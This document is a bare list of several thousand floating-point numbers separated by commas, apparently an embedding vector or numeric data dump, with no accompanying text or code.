0.004282779060304165, -0.01796714961528778, 0.009287587366998196, -0.02213212475180626, -0.019456813111901283, -0.0051910169422626495, 0.009675203822553158, 0.0195632167160511, 0.02888120524585247, -0.013756574131548405, -0.0018269262509420514, 0.015185434371232986, 0.005593833513557911, -0.0019684822764247656, -0.007463511545211077, 0.020171241834759712, 0.026813918724656105, -0.01603666879236698, 0.012213709764182568, 0.006334864534437656, 0.016887905076146126, -0.026388302445411682, -0.024883439764380455, 0.034931059926748276, 0.005137814674526453, 0.013999784365296364, -0.00474639842286706, 0.011833693832159042, -0.011233269236981869, 0.0008873370243236423, -0.005004808772355318, -0.012213709764182568, 0.0030648279935121536, -0.008307146839797497, 0.011126864701509476, -0.015626251697540283, -0.01606707088649273, -0.00692768907174468, -0.029124416410923004, 0.014562208205461502, -0.016234278678894043, 0.026449104771018028, -0.024609828367829323, 0.008329947479069233, 0.01827116310596466, 0.003427743213251233, 0.008732764981687069, 0.006946689914911985, -0.0010602442780509591, 0.013505764305591583, 0.008291945792734623, 0.005506429821252823, -0.010070420801639557, -0.007273503579199314, 0.006027051713317633, 0.019776025786995888, -0.01621907763183117, -0.018924789503216743, 0.004579191096127033, 0.0021983918268233538, -0.009196383878588676, -0.0043587819673120975, 0.012981342151761055, 0.0058028423227369785, 0.00020081464026588947, 0.014752215705811977, 0.00010040732013294473, -0.0036766536068171263, 0.00458679161965847, -0.004864203277975321, 0.00249290419742465, 0.004639993887394667, 0.03514386713504791, -0.003456244245171547, 0.0012673529563471675, 0.00909757986664772, -0.0280147697776556, 0.018407968804240227, 0.0018373767379671335, 0.0035550484899431467, 0.013004142791032791, -0.004297979641705751, -0.00402816804125905, -0.0011628485517576337, -0.03453584387898445, 0.01082285214215517, -0.012418918311595917, 0.02080966904759407, -0.0033080382272601128, -0.020080039277672768, -0.010442836210131645, 0.0025442063342779875, -0.009850011207163334, 0.02137209288775921, -0.013627368956804276, 0.011233269236981869, 0.006661678198724985, -0.00708729587495327, 0.01769353821873665, -0.010602442547678947, 0.03237735107541084, 0.008953173644840717, 0.017480729147791862, 0.009644802659749985, -0.005320222117006779, -0.007288704160600901, 0.005487428978085518, -0.00043725574505515397, 0.010936856269836426, 0.01565665379166603, 0.02020164392888546, 0.009295187890529633, 0.00588264549151063, 0.019046396017074585, -0.015390642918646336, -0.009219184517860413, -0.005989050026983023, -0.0012768532615154982, -0.006901088170707226, 0.015930265188217163, -0.013080146163702011, -0.008649161085486412, -0.002608808921650052, 0.023165768012404442, -0.004244777373969555, 0.008763166144490242, 0.0019380808807909489, -0.007520514074712992, 0.012540523894131184, -0.023332973942160606, 0.014547007158398628, -0.005506429821252823, 0.010397234000265598, -0.005240418948233128, -0.025521865114569664, 0.01313334796577692, 0.010724048130214214, -0.005749640055000782, -0.010526439175009727, -0.0124873211607337, 0.017298322170972824, 0.016948707401752472, 0.011468878947198391, 0.011096463538706303, 0.008238743990659714, 0.006798483897000551, -0.015580650418996811, -0.009834811091423035, -0.024199411273002625, 0.0043093799613416195, 0.0005443727131932974, 0.0234241783618927, -0.007740923203527927, 0.00334413954988122, -0.02388019673526287, 0.0070644947700202465, -0.002380799502134323, -0.0030458271503448486, 0.0017224219627678394, -0.010412435047328472, -0.01019202545285225, -0.001189449685625732, -0.012806534767150879, -0.013163750059902668, 0.0042143757455050945, 0.015421044081449509, 0.0007923330995254219, -0.008474353700876236, -0.023788994178175926, 0.006745281629264355, 0.002789316466078162, -0.004484187345951796, -0.012335315346717834, 0.005453227553516626, 0.002502404386177659, -0.01317134965211153, 0.01178809255361557, -0.001471611438319087, -0.007250702939927578, 0.0028235178906470537, 0.010549240745604038, 0.0009395892266184092, -0.0007362807518802583, -0.01415939163416624, -0.005293621215969324, -0.021098481491208076, 0.02327217161655426, -0.016781501471996307, -0.001518163364380598, -0.01758713461458683, -0.006958090700209141, -0.01244931947439909, -0.02626669593155384, 0.032954975962638855, -0.006771882995963097, 0.0322861485183239, 0.0140073848888278, -0.018027951940894127, -0.006954290438443422, -0.020946474745869637, -0.009401592426002026, 0.016903106123209, -0.01478261686861515, -0.013482962734997272, -0.00909757986664772, 0.012570925056934357, 0.02474663406610489, -0.011491679586470127, -0.01568705588579178, -0.013346157036721706, -0.026996327564120293, 0.0007058794726617634, -0.007231702096760273, -0.0011096462840214372, 0.02755875140428543, -0.011818493716418743, 0.005335422698408365, -0.014767416752874851, -0.0051720160990953445, 0.0013870579423382878, 0.02175210788846016, 0.0203840509057045, -0.002323796972632408, -0.02012564055621624, -0.02512664906680584, 0.0042143757455050945, -0.014721814543008804, -0.001962781883776188, -0.0042599779553711414, -0.00760791776701808, -0.00583704374730587, 0.005890246015042067, -0.002639210317283869, -0.007782725151628256, -0.035417478531599045, -0.001679670182056725, 0.017541533336043358, 0.013080146163702011, 0.004229576792567968, 0.026661913841962814, 0.0028216177597641945, -0.009728406555950642, -0.007782725151628256, 0.00712529756128788, 0.012494921684265137, 0.013589367270469666, 0.013026944361627102, 0.01834716647863388, 0.0043473816476762295, -0.002293395809829235, 0.012456919997930527, -0.003009725594893098, 0.006141056306660175, -0.013536165468394756, 0.007980333641171455, -0.00905957818031311, -0.011871695518493652, 0.012251711450517178, 0.006821285001933575, -0.02152409963309765, 0.003471445059403777, 0.007782725151628256, -0.01583906076848507, 0.007326705846935511, -0.0017252720426768064, -0.0034847455099225044, 0.012760932557284832, 0.0018459270941093564, 0.025841079652309418, 0.0021299889776855707, -0.020110439509153366, -0.016994310542941093, -0.008003134280443192, 0.006464069709181786, 0.014729415066540241, -0.0030895289964973927, 0.008421151898801327, -0.007406509481370449, 0.023895397782325745, -0.0005643235635943711, -0.007452111225575209, -0.006638877093791962, 0.017678339034318924, -0.0015884663444012403, 0.01156008243560791, 0.0034923458006232977, 0.006148656830191612, -0.010237627662718296, 0.006456469651311636, 0.0021166882943361998, -0.003925563767552376, -0.016082271933555603, -0.009165982715785503, -0.012251711450517178, 0.01697910949587822, -0.00915078166872263, 0.014280996285378933, -0.007030293345451355, -0.005020009819418192, 0.013543765991926193, -0.0084515530616045, -0.029352426528930664, -0.001087795477360487, -0.001121046836487949, -0.01761753484606743, 0.015474245883524418, 0.004776799585670233, 0.02088567242026329, -0.01675109937787056, 0.004818601068109274, -0.047881998121738434, -0.006460269913077354, 0.00752431433647871, -0.010207226499915123, -0.0005871244939044118, 0.009355990216135979, -0.0049972087144851685, 0.007911930792033672, 0.011309272609651089, -0.019426411017775536, 0.006163857411593199, 0.007296304684132338, -0.011780492030084133, -0.022770550101995468, -0.015223436057567596, 0.008436352014541626, -0.00628166226670146, 0.016051869839429855, 0.004062369465827942, 0.008193141780793667, 0.01080005057156086, 0.000345339416526258, -0.02413860708475113, 0.014577408321201801, -0.01890959031879902, -0.00856555812060833, 0.011423276737332344, -0.01948721334338188, -0.042622581124305725, -0.00036576527054421604, 0.017298322170972824, -0.019000792875885963, -0.015367841348052025, -0.01963922008872032, 0.0058408440090715885, 0.02743714489042759, 0.006920089013874531, 0.027695557102560997, -0.0018630278063938022, -0.000022563443053513765, 0.02353058196604252, -0.018210360780358315, -0.011453677900135517, -0.0049858083948493, -0.00474639842286706, 0.043413013219833374, 0.03192133456468582, -0.004438585136085749, 0.005396225489675999, 0.009979216381907463, -0.009850011207163334, -0.009698005393147469, 0.018058354035019875, -0.010526439175009727, 0.021767308935523033, -0.008193141780793667, 0.002985024591907859, -0.013330956920981407, 0.0234241783618927, 0.0080563360825181, -0.005901646334677935, 0.014721814543008804, 0.0020368851255625486, -0.006984691601246595, 0.0009600151097401977, -0.006141056306660175, 0.023211369290947914, 0.015124631114304066, 0.010275629349052906, 0.015793459489941597, -0.0043967836536467075, 0.013885780237615108, -0.015854261815547943, -0.022983359172940254, -0.019396010786294937, -0.007269703783094883, -0.010214826092123985, 0.017556732520461082, -0.006920089013874531, 0.005460828077048063, -0.002031184732913971, 0.0012284013209864497, -0.03065967932343483, -0.0001353806583210826, -0.007136697880923748, 0.011225668713450432, -0.007573716342449188, -0.014037786051630974, 0.00041896748007275164, 0.027117932215332985, -0.0034543443471193314, 0.013726172968745232, -0.0012502522440627217, 0.0018782283877953887, -0.021128881722688675, 0.012114905752241611, 0.0005533981020562351, -0.008785966783761978, -0.009143182076513767, 0.009599200449883938, -0.007429310120642185, -0.007254502736032009, 0.009120380505919456, -0.012722930870950222, -0.02588668093085289, -0.004248577635735273, -0.016249477863311768, -0.001957081723958254, -0.00447278656065464, 0.01180329266935587, 0.023773793131113052, 0.01705511286854744, 0.0057648406364023685, 0.01178809255361557, 0.0018164758803322911, 0.0005719238542951643, -0.003209233982488513, -0.017647936940193176, -0.00310282944701612, 0.012198509648442268, -0.0033802411053329706, 0.0034657446667551994, 0.01974562369287014, 0.034323032945394516, -0.02099207602441311, -0.005263219587504864, 0.01573265716433525, -0.0028634194750338793, -0.007676320616155863, -0.002137589268386364, -0.017267921939492226, 0.007281104102730751, 0.0010953957680612803, 0.007649719249457121, 0.0008170341025106609, -0.020034436136484146, 0.012814135290682316, -0.0056280349381268024, -0.0057914420031011105, -0.03338059410452843, 0.002631609793752432, -0.007186099886894226, -0.0010364932240918279, -0.017754340544342995, 0.024017002433538437, -0.003209233982488513, 0.003716555191203952, 0.014623010531067848, 0.0026981127448379993, 0.02441221848130226, -0.03283337131142616, 0.0031978334300220013, -0.008937973529100418, -0.008877170272171497, -0.01664469577372074, 0.010382033884525299, -0.0009220134816132486, -0.009401592426002026, 0.01083805225789547, 0.011248469352722168, 0.003110429970547557, 0.025445861741900444, -0.018666379153728485, -0.023332973942160606, 0.006448869127780199, 0.02030804753303528, 0.004442385397851467, 0.019882429391145706, -0.006030851975083351, -0.012791333720088005, -0.001983682857826352, -0.0084515530616045, -0.013057345524430275, -0.029246021062135696, -0.011818493716418743, 0.015542648732662201, 0.014433003030717373, 0.019502414390444756, 0.018848786130547523, 0.0028653196059167385, 0.02664671279489994, 0.005510230083018541, -0.011962899938225746, -0.03453584387898445, -0.012016101740300655, 0.015405843034386635, 0.017419926822185516, 0.02353058196604252, -0.0019969833083450794, -0.01944161206483841, -0.003959765192121267, 0.005232818424701691, 0.002006483729928732, 0.014455803669989109, -0.0070644947700202465, -0.02175210788846016, 0.003963565453886986, -0.002181291114538908, 0.03933924436569214, 0.022937757894396782, 0.0026810120325535536, -0.011035661213099957, -0.004674195311963558, 0.010070420801639557, 0.016796700656414032, 0.010769649408757687, -0.013733773492276669, -0.005263219587504864, 0.02050565555691719, 0.013840178027749062, -0.0010744949104264379, -0.0004116046766284853, -0.006532472558319569, -0.008185542188584805, 0.015390642918646336, 0.00744831096380949, 0.01675109937787056, 0.0036709532141685486, 0.0036082507576793432, 0.0026563110295683146, 0.0024017002433538437, -0.018255962058901787, -0.00012041752779623494, -0.005145414732396603, 0.012213709764182568, 0.014600209891796112, 0.025521865114569664, 0.022466538473963737, -0.011408076621592045, 0.0013196051586419344, -0.018058354035019875, 0.016948707401752472, -0.007934731431305408, 0.010009617544710636, -0.03505266457796097, -0.005814242642372847, 0.017374325543642044, 0.020566457882523537, 0.011210467666387558, -0.011240869760513306, 0.0012227010447531939, 0.004351181909441948, -0.014037786051630974, -0.020475255325436592, 0.015413443557918072, -0.00631966395303607, -0.007433110382407904, -0.0007225051522254944, -0.008231143467128277, -0.02606908790767193, 0.0025993085000663996, 0.005293621215969324, 0.0009144131909124553, 0.003346039680764079, -0.0031503315549343824, 0.025445861741900444, -0.009333189576864243, 0.007919530384242535, -0.015717456117272377, -0.027467546984553337, -0.00760791776701808, -0.0057648406364023685, 0.00447278656065464, 0.039552051573991776, -0.028850805014371872, -0.008367949165403843, -0.029458830133080482, 0.015208235010504723, 0.01260132621973753, 0.015147432684898376, -0.004609592258930206, -0.0010364932240918279, -0.015322240069508553, 0.008117139339447021, -0.005457027815282345, 0.0002560356806498021, -0.008101938292384148, 0.012213709764182568, -0.011339673772454262, -0.008770766668021679, 0.007094896398484707, 0.0017993751680478454, 0.003971165977418423, 0.00841355137526989, 0.025613069534301758, -0.0011447977740317583, -0.009994417428970337, -0.026509907096624374, -0.01659909263253212, -0.01019202545285225, -0.014790217392146587, -0.0149878254160285, 0.00000537737287231721, 0.012662128545343876, -0.01728312112390995, -0.010686046443879604, -0.025309056043624878, 0.028516391292214394, 0.02350018173456192, 0.019532816484570503, -0.0017148215556517243, 0.012624126859009266, 0.01254812441766262, 0.01906159520149231, -0.030264463275671005, 0.013034543953835964, -0.026008285582065582, 0.016051869839429855, -0.011392875574529171, 0.019076796248555183, -0.008193141780793667, 0.0007942331722006202, 0.0013889579568058252, -0.01667509600520134, 0.006893487647175789, 0.012836935929954052, 0.006289262790232897, -0.03392781689763069, 0.005198617000132799, 0.00269621261395514, 0.005692637525498867, -0.017343923449516296, 0.024655429646372795, 0.007440710905939341, -0.004153573419898748, 0.0025252054911106825, 0.008709963411092758, 0.004404383711516857, -0.028744399547576904, -0.030234063044190407, -0.010480837896466255, 0.0020292848348617554, -0.00756991608068347, 0.022086521610617638, -0.011415676213800907, 0.0051036132499575615, -0.004069969989359379, -0.00011513293429743499, 0.009234385564923286, 0.02410820685327053, 0.02172170765697956, 0.003921763971447945, 0.013482962734997272, 0.021387293934822083, -0.0022154925391077995, 0.01184129435569048, -0.011256069876253605, -0.02236013300716877, -0.00011816118058050051, -0.008238743990659714, -0.00822354294359684, 0.001372807309962809, -0.011210467666387558, 0.0041839745827019215, -0.012897738255560398, 0.0011096462840214372, 0.0016730198403820395, -0.000009856661563389935, -0.02824277989566326, -0.026008285582065582, 0.003363140393048525, 0.000969990505836904, 0.014204992912709713, -0.026555508375167847, 0.005137814674526453, -0.011370074935257435, -0.022907355800271034, -0.012289713136851788, 0.020292846485972404, 0.01751113124191761, 0.0010421935003250837, -0.015238636173307896, 0.00008146589971147478, -0.02380419336259365, 0.02603868767619133, 0.009568799287080765, 0.008535156026482582, -0.012016101740300655, 0.011742490343749523, 0.031252503395080566, -0.0051036132499575615, -0.00820834282785654, 0.008459153585135937, 0.02903321199119091, 0.004514588508754969, -0.003866661572828889, 0.0012379017425701022, 0.04082890599966049, 0.005719238892197609, 0.007182300090789795, 0.015778258442878723, 0.008877170272171497, 0.0062360605224967, 0.010921656154096127, 0.008041135966777802, -0.010678445920348167, 0.029170017689466476, 0.0008051586337387562, -0.01187929604202509, -0.016842303797602654, -0.024047404527664185, 0.005023809615522623, 0.005194816738367081, -0.0017328723333775997, -0.015443844720721245, -0.007896729744970798, -0.01513983216136694, 0.013817377388477325, 0.015504647046327591, 0.002625909633934498, 0.011962899938225746, 0.007927130907773972, 0.009561199694871902, 0.0030458271503448486, 0.005833243485540152, 0.0035227471962571144, 0.000025383871616213582, -0.0025917082093656063, 0.004465186502784491, -0.0055900332517921925, -0.007326705846935511, -0.0035341475158929825, -0.005749640055000782, -0.002223092829808593, -0.00924958661198616, 0.005544431507587433, -0.019852029159665108, 0.019198400899767876, 0.001564715290442109, 0.009682804346084595, -0.0055900332517921925, -0.02080966904759407, -0.0035341475158929825, 0.0019200302194803953, -0.032164543867111206, 0.0006360515835694969, -0.022648945450782776, -0.004864203277975321, 0.01720711775124073, 0.004468986764550209, -0.014516605995595455, -0.02637310139834881, -0.019122399389743805, -0.0043587819673120975, -0.005240418948233128, -0.006711080204695463, -0.018240761011838913, 0.02796916849911213, -0.007224101573228836, -0.020034436136484146, -0.0015324139967560768, -0.003340339520946145, -0.02570427395403385, 0.015132231637835503, 0.020338449627161026, -0.04365622252225876, 0.0033118382561951876, 0.013353757560253143, -0.01015402376651764, 0.00741030927747488, -0.00937879178673029, -0.007068295031785965, -0.00027717408374883235, 0.009158382192254066, -0.0025480063632130623, 0.008907572366297245, 0.004579191096127033, 0.006646477617323399, 0.007995533756911755, -0.00909757986664772, -0.018240761011838913, 0.010883654467761517, 0.011848894879221916, -0.014661012217402458, -0.000015408455510623753, 0.0031389310024678707, 0.0007305805338546634, -0.0007358057191595435, 0.025537066161632538, -0.0035968502052128315, 0.03131330758333206, 0.011408076621592045, -0.005221418105065823, 0.004753998480737209, -0.010389633476734161, -0.0005714488797821105, -0.008215943351387978, 0.013756574131548405, -0.0026848120614886284, 0.002230693120509386, -0.0044347853399813175, 0.013125748373568058, -0.03800158575177193, -0.007691521197557449, -0.0050542112439870834, -0.00820834282785654, -0.018027951940894127, -0.008823968470096588, 0.008611159399151802, -0.006574274506419897, -0.02141769416630268, -0.013870579190552235, 0.0064906710758805275, 0.018210360780358315, 0.021919315680861473, 0.006650277879089117, 0.008276745676994324, -0.01807355508208275, -0.015702255070209503, -0.012912939302623272, 0.01156008243560791, -0.005175815895199776, -0.008770766668021679, 0.015398242510855198, -0.0090215764939785, 0.018970392644405365, 0.010496038012206554, 0.00016780075384303927, 0.005274620372802019, -0.01951761543750763, 0.018103955313563347, 0.009606800973415375, 0.01814955845475197, 0.010146423242986202, 0.0037773577496409416, -0.029428428038954735, -0.022572942078113556, 0.010716447606682777, -0.023211369290947914, 0.007357107009738684, 0.0014982125721871853, -0.0072659035213291645, -0.006737681571394205, -0.0028102174401283264, 0.024047404527664185, 0.002912821713835001, -0.010017218068242073, 0.028455588966608047, 0.006019451189786196, 0.0002293158322572708, -0.009903213940560818, 0.02141769416630268, 0.014242994599044323, 0.005909246858209372, 0.004313180223107338, -0.000024641654817969538, -0.0037146550603210926, 0.014311397448182106, -0.003351739840582013, -0.0253546591848135, 0.01251012273132801, 0.01501062698662281, -0.005593833513557911, 0.03702874481678009, 0.013885780237615108, 0.003363140393048525, 0.007243102416396141, 0.003142731264233589, -0.03487025573849678, 0.002185091143473983, 0.00631966395303607, 0.00784352794289589, 0.005267019849270582, -0.017176717519760132, 0.014204992912709713, 0.009325589053332806, -0.005890246015042067, 0.004666594788432121, -0.02812117338180542, -0.030978893861174583, 0.007778924889862537, 0.0028843204490840435, -0.001858277595601976, 0.01080005057156086, -0.014471004717051983, 0.014995425939559937, 0.01432659849524498, 0.005951048340648413, -0.013049745000898838, -0.002038785023614764, 0.006038452032953501, 0.02210172265768051, 0.0012236511101946235, -0.009568799287080765, -0.0048528024926781654, 0.00539242522791028, 0.02210172265768051, 0.009386392310261726, -0.0031883332412689924, -0.01347536314278841, 0.005312622059136629, 0.017678339034318924, 0.006285462528467178, -0.011947698891162872, 0.019198400899767876, 0.010313631035387516, 0.03815359249711037, -0.003902762895449996, -0.009827210567891598, -0.01682710275053978, 0.011392875574529171, -0.00414977315813303, -0.007972733117640018, 0.009507996961474419, 0.0013775575207546353, 0.02023204416036606, -0.0016844203928485513, -0.011347273364663124, -0.023560984060168266, 0.009796809405088425, -0.0028197176288813353, 0.01634068228304386, 0.002466303063556552, -0.0018535273848101497, 0.018970392644405365, -0.00013336181291379035, 0.020672863349318504, 0.004218176007270813, 0.008041135966777802, -0.015261436812579632, 0.0028862205799669027, -0.017982350662350655, 0.014037786051630974, 0.03377581015229225, -0.022846553474664688, 0.006817484740167856, -0.011408076621592045, 0.0134525615721941, -0.01751113124191761, 0.002614509081467986, 0.018331965431571007, -0.021706506609916687, -0.003710855031386018, -0.011719689704477787, 0.003232034854590893, 0.006179057992994785, 0.0028425187338143587, 0.005491229239851236, -0.010366832837462425, 0.014242994599044323, 0.0015960666351020336, -0.011225668713450432, 0.004818601068109274, 0.021463295444846153, 0.006247460842132568, -0.010465636849403381, -0.015329839661717415, 0.006874487269669771, -0.0007396058645099401, -0.029990851879119873, 0.0015466646291315556, -0.017009509727358818, 0.013125748373568058, 0.0008146589971147478, 0.007588916923850775, -0.022527340799570084, -0.013110547326505184, 0.0019931832794100046, -0.02570427395403385, 0.017024710774421692, -0.0019855829887092113, 0.013824976980686188, -0.01163608580827713, 0.013824976980686188, -0.008185542188584805, -0.01110406406223774, 0.0066160764545202255, -0.008687162771821022, 0.0036329517606645823, -0.0005400975351221859, -0.005844644270837307, 0.015443844720721245, 0.0161126721650362, 0.002422601217404008, 0.005130214150995016, 0.019730424508452415, -0.022314531728625298, -0.011932497844099998, -0.009477595798671246, -0.0032206345349550247, -0.010648044757544994, -0.008041135966777802, -0.009112780913710594, -0.001444060355424881, -0.033410996198654175, 0.01091405563056469, 0.0034106425009667873, -0.016629494726657867, 0.010534039698541164, -0.005605233833193779, -0.009363590739667416, 0.004206775687634945, 0.01948721334338188, -0.006950490176677704, 0.018179958686232567, -0.003718455322086811, -0.025293856859207153, 0.01728312112390995, -0.005935847759246826, -0.004982008133083582, 0.03262056037783623, 0.0000506193027831614, -0.0009604900842532516, -0.006239860784262419, 0.017328724265098572, 0.014577408321201801, -0.016006268560886383, -0.021052878350019455, -0.007547114975750446, 0.00103554327506572, -0.0032244345638900995, 0.0010963458335027099, 0.0022610945161432028, -0.0003384516458027065, 0.009272387251257896, 0.0006512521649710834, -0.0022876954171806574, 0.01644708588719368, -0.02088567242026329, 0.01102806068956852, 0.006730081047862768, -0.01834716647863388, 0.009880412369966507, -0.020110439509153366, -0.01735912449657917, -0.000915363198146224, -0.014486204832792282, 0.02357618510723114, -0.021356891840696335, 0.0012417018879204988, -0.002318096812814474, -0.01659909263253212, -0.003290937514975667, -0.0028425187338143587, 0.005707838106900454, 0.008519955910742283, 0.011278870515525341, 0.0011609484208747745, 0.012221310287714005, 0.009067178703844547, 0.01336135808378458, -0.0057648406364023685, -0.0037640570662915707, 0.011902096681296825, 0.003036326728761196, 0.007007492706179619, -0.004769199062138796, 0.018240761011838913, 0.00978160835802555, -0.019852029159665108, -0.016811901703476906, 0.029063614085316658, 0.0016511689173057675, -0.022785751149058342, 0.0034923458006232977, -0.03002125397324562, 0.021706506609916687, -0.012221310287714005, 0.028820402920246124, -0.00422577653080225, -0.005092212464660406, 0.008854369632899761, 0.005236618686467409, 0.015542648732662201, -0.01421259343624115, -0.015565450303256512, 0.008238743990659714, -0.0009661903604865074, 0.009165982715785503, 0.02073366567492485, 0.03137411177158356, 0.004210575949400663, -0.009051977656781673, 0.0014127090107649565, 0.018818385899066925, 0.0016103172674775124, 0.01751113124191761, -0.002329497365280986, -0.015930265188217163, 0.010093221440911293, -0.0006569524412043393, -0.0012759033124893904, 0.01979122683405876, 0.01720711775124073, -0.008846769109368324, 0.026920324191451073, 0.001893429085612297, -0.0029527232982218266, 0.015117031522095203, 0.009538398124277592, -0.0006484020850621164, 0.005730639211833477, 0.0031256305519491434, -0.007117697037756443, 0.005749640055000782, -0.0026050086598843336, 0.005449427757412195, 0.0016587692080065608, 0.0035360476467758417, -0.0003382141294423491, -0.01830156333744526, -0.021767308935523033, 0.009234385564923286, -0.004689395893365145, -0.008633960969746113, -0.012920539826154709, -0.008808767423033714, 0.014813018962740898, 0.006650277879089117, -0.01017682533711195, -0.02091607265174389, 0.013916181400418282, -0.002044485416263342, 0.005517830606549978, -0.028713999316096306, -0.02172170765697956, -0.023180967196822166, 0.013125748373568058, 0.0016464187065139413, -0.009241986088454723, -0.013665370643138885, -0.0013253053184598684, -0.004484187345951796, 0.003834360046312213, -0.010252827778458595, 0.011309272609651089, 0.016811901703476906, 0.00599665055051446, -0.004020567983388901, -0.009500396437942982, 0.02758915163576603, -0.020019235089421272, 0.018210360780358315, -0.010518839582800865, 0.02202571928501129, 0.013824976980686188, -0.02705712988972664, -0.006068853195756674, 0.003327038837596774, -0.0014820619253441691, -0.005286020692437887, 0.006498271133750677, -0.011696888133883476, 0.018742382526397705, 0.00824634451419115, -0.003159831976518035, -0.011909697204828262, 0.00829954631626606, -0.0022135924082249403, 0.014889021404087543, 0.0019722823053598404, 0.013726172968745232, 0.011689288541674614, 0.0012958541046828032, -0.006293062586337328, 0.005909246858209372, 0.016842303797602654, 0.01409858837723732, -0.00047644489677622914, 0.01705511286854744, -0.013612168841063976, -0.0004633818462025374, -0.020520856603980064, 0.01059484202414751, 0.012738131918013096, 0.003142731264233589, 0.012312513776123524, 0.029474031180143356, -0.01502582710236311, 0.0021337890066206455, 0.01887918822467327, 0.004237176850438118, -0.0057458397932350636, -0.03550868108868599, -0.006775682792067528, -0.0057344394735991955, -0.008238743990659714, 0.00031992586445994675, 0.014539407566189766, -0.013771775178611279, -0.002584107918664813, -0.015299438498914242, 0.004605792462825775, -0.003009725594893098, 0.018134357407689095, -0.0027247138787060976, 0.02179771102964878, 0.027771560475230217, -0.001830726396292448, -0.005529230926185846, -0.015018227510154247, 0.01086085382848978, -0.008687162771821022, 0.00684028584510088, -0.021767308935523033, 0.011301672086119652, -0.008033535443246365, 0.014767416752874851, -0.010397234000265598, 0.010366832837462425, 0.0005514980293810368, 0.0064222682267427444, -0.002052085706964135, 0.012981342151761055, -0.001573265646584332, 0.013916181400418282, 0.011757691390812397, 0.015930265188217163, 0.014547007158398628, 0.001329105463810265, -0.003817259334027767, -0.0019171800231561065, -0.0019342807354405522, 0.007797925733029842, 0.026631511747837067, 0.03581269457936287, 0.019988834857940674, 0.009089979343116283, 0.018012752756476402, 0.010511239059269428, 0.00015818160318303853, 0.0019969833083450794, 0.0050656115636229515, 0.01966962218284607, 0.021691305562853813, 0.011332073248922825, -0.004073770251125097, 0.000249385426286608, 0.006684479303658009, 0.009325589053332806, -0.007813125848770142, 0.01478261686861515, 0.014691413380205631, -0.017450328916311264, -0.014052987098693848, -0.0016996209742501378, 0.0065400730818510056, 0.020095238462090492, -0.012061703950166702, -0.004776799585670233, -0.025567468255758286, -0.008709963411092758, 0.0491892546415329, -0.006600875407457352, 0.0017556733218953013, -0.0010545440018177032, 0.023773793131113052, -0.0119172977283597, -0.030340466648340225, 0.029063614085316658, -0.0027950166258960962, 0.012874937616288662, 0.006323464214801788, -0.010997659526765347, 0.0059472485445439816, -0.011620885692536831, 0.00203308486379683, 0.00978160835802555, 0.014889021404087543, 0.003203533822670579, -0.019912831485271454, 0.0013272054493427277, 0.0015143632190302014, -0.030538074672222137, -0.0031199303921312094, 0.01404538657516241, 0.006980891339480877, 0.0009747407166287303, -0.00921158492565155, -0.007680120877921581, -0.007638318929821253, 0.009363590739667416, -0.0050656115636229515, 0.004932606127113104, -0.020460054278373718, -0.004750198218971491, -0.005525430664420128, -0.021311290562152863, -0.03283337131142616, 0.0015409643528982997, 0.02327217161655426, 0.005270820111036301, -0.008801167830824852, 0.010754449293017387, -0.004180174320936203, 0.0013975083129480481, 0.007117697037756443, -0.012114905752241611, -0.01167408749461174, 0.011848894879221916, -0.028485989198088646, 0.012000900693237782, 0.0020159841515123844, 0.016629494726657867, -0.00006774970097467303, -0.0016188676236197352, -0.006502071395516396, 0.021159283816814423, -0.021463295444846153, 0.010511239059269428, -0.0002073461510008201, 0.0017908248119056225, -0.0013870579423382878, 0.009029177017509937, 0.00024344766279682517, 0.01228211261332035, 0.0018316764617338777, 0.005381024908274412, -0.026099490001797676, -0.017009509727358818, 0.014128989540040493, 0.010724048130214214, 0.0006536272703669965, -0.007767524570226669, 0.001236001611687243, -0.011347273364663124, 0.0014478605007752776, -0.0013424060307443142, -0.004332181066274643, 0.0004683695442508906, -0.006870687007904053, 0.015329839661717415, 0.016766300424933434, -0.014835819602012634, 0.007919530384242535, 0.010359232313930988, 0.025065846741199493, 0.009219184517860413, -0.0026867121923714876, 0.017678339034318924, -0.013726172968745232, 0.00012552399130072445, -0.014714214019477367, -0.023545783013105392, -0.0268747229129076, 0.022162524983286858, 0.013520964421331882, 0.009682804346084595, -0.030158059671521187, 0.009325589053332806, 0.005662236362695694, -0.021204885095357895, 0.006285462528467178, 0.014653411693871021, 0.011423276737332344, 0.01921360194683075, -0.01682710275053978, 0.025917083024978638, 0.020095238462090492, 0.005441827233880758, 0.02213212475180626, -0.017237519845366478, -0.0016274179797619581, -0.030750883743166924, -0.008732764981687069, 0.017602335661649704, -0.0070340936072170734, -0.007577516604214907, -0.012228910811245441, -0.028698798269033432, -0.000528697099070996, 0.006141056306660175, 0.016583891585469246, 0.016401484608650208, 0.00027337390929460526, -0.010442836210131645, 0.007398908957839012, 0.004620993044227362, 0.016857502982020378, 0.0057154386304318905, 0.013118147850036621, 0.013946582563221455, -0.0029641238506883383, 0.010579641908407211, -0.01880318485200405, -0.013080146163702011, 0.055391114205121994, 0.0007286804029718041, 0.023925799876451492, -0.003581649623811245, -0.006213259417563677, 0.004830001853406429, -0.005989050026983023, -0.015869462862610817, -0.028379585593938828, 0.003836260177195072, 0.007995533756911755, 0.007672520354390144, 0.014835819602012634, -0.00764591945335269, 0.010321230627596378, -0.018635978922247887, -0.012540523894131184, -0.0073723080568015575, -0.017830343917012215, -0.022724948823451996, -0.003853360889479518, 0.002781716175377369, 0.01834716647863388, -0.01099005900323391, -0.0042219762690365314, 0.009660003706812859, -0.011696888133883476, 0.004449985921382904, 0.0077523235231637955, -0.03301578015089035, 0.0149726253002882, -0.015345040708780289, 0.028333982452750206, 0.0018924790201708674, 0.009447194635868073, 0.01830156333744526, 0.018590375781059265, 0.01271533127874136, -0.00826154462993145, -0.02989964932203293, 0.009675203822553158, 0.022679347544908524, -0.005308821797370911, -0.00459439167752862, 0.006699679885059595, 0.014919422566890717, -0.0015884663444012403, -0.01013882365077734, -0.006300663109868765, 0.0391264334321022, 0.029990851879119873, -0.007782725151628256, -0.005829443223774433, 0.014949824661016464, 0.004085170570760965, -0.02353058196604252, -0.0018848787294700742, -0.010283228941261768, -0.009386392310261726, -0.02350018173456192, -0.00551403034478426, -0.008687162771821022, -0.003357440233230591, -0.003365040523931384, -0.02395620010793209, 0.003053427441045642, 0.007193700410425663, 0.02141769416630268, -0.018590375781059265, 0.012570925056934357, 0.0022515940945595503, 0.010625244118273258, -0.009112780913710594, -0.005434226710349321, -0.012973741628229618, -0.014653411693871021, 0.00913558155298233, -0.014501405879855156, 0.003898962866514921, -0.019988834857940674, 0.0027931167278438807, -0.004814801272004843, -0.014052987098693848, -0.008869570679962635, 0.006771882995963097, 0.005977649707347155, 0.0033232388086616993, 